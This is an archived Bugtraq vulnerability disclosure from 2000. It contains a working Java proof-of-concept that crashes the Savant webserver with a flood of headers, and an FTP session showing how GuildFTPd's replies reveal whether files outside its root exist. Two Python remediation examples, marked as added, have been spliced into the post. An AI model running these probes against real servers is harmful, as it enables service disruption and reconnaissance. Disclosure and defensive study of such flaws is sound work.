5263750 2000-07-10  10:58  /110 lines/ Postmaster
Recipient: Bugtraq (import) <11666>
Subject: gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.BSF.4.10.10007081536560.12309-100000@unix.za.net>
Date:         Sat, 8 Jul 2000 15:41:29 +0200
Reply-To: Andrew Lewis <wizdumb@UNIX.ZA.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Andrew Lewis <wizdumb@UNIX.ZA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

Yo,

Errr... Sorry about saying gnu-pop3d had the same problem as FTGate -
don't know how that got in my list - I assume from posting after a
rather hectic party and before that vital cup of coffee the next
day. :) Apologies, all.

Anyway, I found a stack overflow in the Savant webserver the other
day - lemmee just paste the code I wrote here...

/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 * Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server receives too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 *
 * Registers:
 *
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 *
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 *
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000]
 */

import java.io.*;
import java.net.*;

class savantstack {

  public static void main(String[] args) throws IOException {

    if (args.length != 1) {
      System.out.println("Syntax: java savantstack [hostname/ip]");
      System.exit(1);
    }

    int i = 5000; // Number of "A:A" header lines to send. This should do fine :-)

    Socket soq = new Socket(args[0], 80);
    PrintWriter white = new PrintWriter(soq.getOutputStream(), true);

    System.out.print("Showing " + args[0] + " the phj33r :P ...");
    white.println("GET /index.html HTTP/1.0");         // request line, terminated by a newline
    for (int x = 0; x < i; x++) white.println("A:A"); // one bogus header per line
    white.println("\n");                              // blank line ends the header block
    System.out.println("Done!");

    white.close();
    soq.close();
  }
}
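The bug the PoC above exercises is a header loop with no upper bound on how many lines it accepts. The usual fix on the server side is to read the request head with hard limits on line length, header count and total header bytes, and to reject the request once any limit is hit. The following is an added example written for this post, not code from Savant or from the MDMA Crew; the limit values and the 431 / 400 status mapping are assumptions for illustration, and flood_request() merely reconstructs the shape of the request the PoC sends so the parser can be exercised offline.

```python
import io

# Constructed limits for the example; real servers pick their own values.
MAX_LINE_BYTES = 1024      # longest single request or header line accepted
MAX_HEADER_LINES = 100     # most header lines accepted per request
MAX_HEADER_BYTES = 8192    # most bytes accepted for the whole header block


class RequestTooLarge(Exception):
    """Raised when the request head exceeds one of the configured limits."""


def read_request_head(stream):
    """Read the request line and headers from a binary stream, bounded.

    Each readline() is capped at MAX_LINE_BYTES + 1 so a line that never
    ends cannot grow without bound; a returned line longer than the cap
    means the sender exceeded it. Returns (request_line, [(name, value)...])
    or raises RequestTooLarge / ValueError.
    """
    request_line = stream.readline(MAX_LINE_BYTES + 1)
    if len(request_line) > MAX_LINE_BYTES:
        raise RequestTooLarge("request line too long")
    headers = []
    total = len(request_line)
    while True:
        line = stream.readline(MAX_LINE_BYTES + 1)
        if len(line) > MAX_LINE_BYTES:
            raise RequestTooLarge("header line too long")
        if line in (b"\r\n", b"\n", b""):
            break  # blank line (or EOF) ends the header block
        # Check the counters before storing anything, so the bound is
        # enforced on the 101st line rather than after it was processed.
        if len(headers) >= MAX_HEADER_LINES:
            raise RequestTooLarge("too many header lines")
        total += len(line)
        if total > MAX_HEADER_BYTES:
            raise RequestTooLarge("header block too large")
        name, sep, value = line.decode("latin-1").rstrip("\r\n").partition(":")
        if not sep or not name.strip():
            raise ValueError("malformed header line")
        headers.append((name.strip(), value.strip()))
    return request_line.decode("latin-1").rstrip("\r\n"), headers


def status_for(raw_request):
    """Status code the hardened server would answer for these raw bytes."""
    try:
        read_request_head(io.BytesIO(raw_request))
    except RequestTooLarge:
        return 431  # Request Header Fields Too Large (RFC 6585)
    except ValueError:
        return 400  # Bad Request
    return 200


def flood_request(n):
    """Constructed input: a request line followed by n 'A:A' header lines,
    the same shape as the proof-of-concept sends."""
    return b"GET /index.html HTTP/1.0\r\n" + b"A:A\r\n" * n + b"\r\n"


if __name__ == "__main__":
    normal = b"GET / HTTP/1.0\r\nHost: example.test\r\n\r\n"
    print("normal request ->", status_for(normal))
    print("5000-header request ->", status_for(flood_request(5000)))
```

Note that the parser stores headers in a growable list rather than a fixed buffer, so even if a limit were set generously the failure mode is a clean rejection, not memory corruption. Setting the limits is still what keeps a single client from holding a connection open while it feeds thousands of lines.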

That's it. I also found a more minor vulnerability in Guild FTPd -
although directory traversal with GET can't be used to d/l files
outside of the FTP root directory, it can be used to see if files
exist. An example follows...

C:\wizdumb>ftp localhost
Connected to kung-phusion.
220-GuildFTPD FTP Server (c) 1999
220-Version 0.93i
220 Please enter your name:
User (kung-phusion:(none)): test
331 User name okay, Need password.
Password:
230 User logged in.
ftp> cd ..
550 Access denied.
ftp> get ../nonexistant.txt
200 PORT command successful.
550 Access denied.
ftp> get ../autoexec.bat
200 PORT command successful.
150 Opening ascii mode data connection for \../autoexec.bat (1143 bytes).
425 Download failed.
ftp> quit
221 Goodbye.  Control connection closed.

The SIZE command can also be used in a similar manner.
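What the session above shows is an existence oracle: the server checks whether the file is there before it checks whether the path is inside the FTP root, so the reply differs between a missing and a present file outside the root. The fix is to resolve the path against the root first and answer identically for anything that escapes it, for both RETR and SIZE. The following is an added example written for this post, not GuildFTPd's code; the reply strings mirror the ones in the session but the handler names, the backslash handling and the sandbox layout built by demo() are assumptions for illustration.

```python
import os
import tempfile

DENIED = "550 Access denied."


def resolve_within_root(root, requested):
    """Map a client-supplied FTP path to a filesystem path.

    Returns the real path if it stays inside root, else None. Backslashes
    are treated as separators because the server in the session runs on
    Windows, where "\\../" is another way to spell "../" (assumption).
    """
    root = os.path.realpath(root)
    rel = requested.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(root, rel))
    try:
        if os.path.commonpath([root, candidate]) != root:
            return None
    except ValueError:  # different drives on Windows, etc.
        return None
    return candidate


def handle_retr(root, requested):
    """RETR: one reply for 'outside root' and 'does not exist', so the
    client learns nothing about files it is not allowed to fetch."""
    target = resolve_within_root(root, requested)
    if target is None or not os.path.isfile(target):
        return DENIED
    size = os.path.getsize(target)
    return "150 Opening ascii mode data connection for %s (%d bytes)." % (requested, size)


def handle_size(root, requested):
    """SIZE: same rule, so it cannot be used as the oracle either."""
    target = resolve_within_root(root, requested)
    if target is None or not os.path.isfile(target):
        return DENIED
    return "213 %d" % os.path.getsize(target)


def demo():
    """Build a constructed sandbox: an FTP root with one file inside it and
    one file just outside it, then issue the requests from the session."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "ftproot")
        os.mkdir(root)
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("inside the root\n")
        with open(os.path.join(tmp, "autoexec.bat"), "w") as f:
            f.write("@echo off\n")  # exists, but outside the root
        return {
            "inside": handle_retr(root, "readme.txt"),
            "outside_existing": handle_retr(root, "../autoexec.bat"),
            "outside_missing": handle_retr(root, "../nonexistant.txt"),
            "backslash": handle_retr(root, "\\../autoexec.bat"),
            "size_outside": handle_size(root, "../autoexec.bat"),
            "size_inside": handle_size(root, "readme.txt"),
        }


if __name__ == "__main__":
    for name, reply in demo().items():
        print("%-17s %s" % (name, reply))
```

The ordering is the whole point: authorization (is the path inside the root?) is decided before any filesystem call that could behave differently for existing and missing files, and both failures collapse onto the same 550 reply.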

Anyway, I'm outta here again...

Cheers,
Andrew Lewis aka. Wizdumb [MDMA]

wizdumb@leet.org
www.mdma.za.net/fk
(5263750) ------------------------------------------(Rewrapped)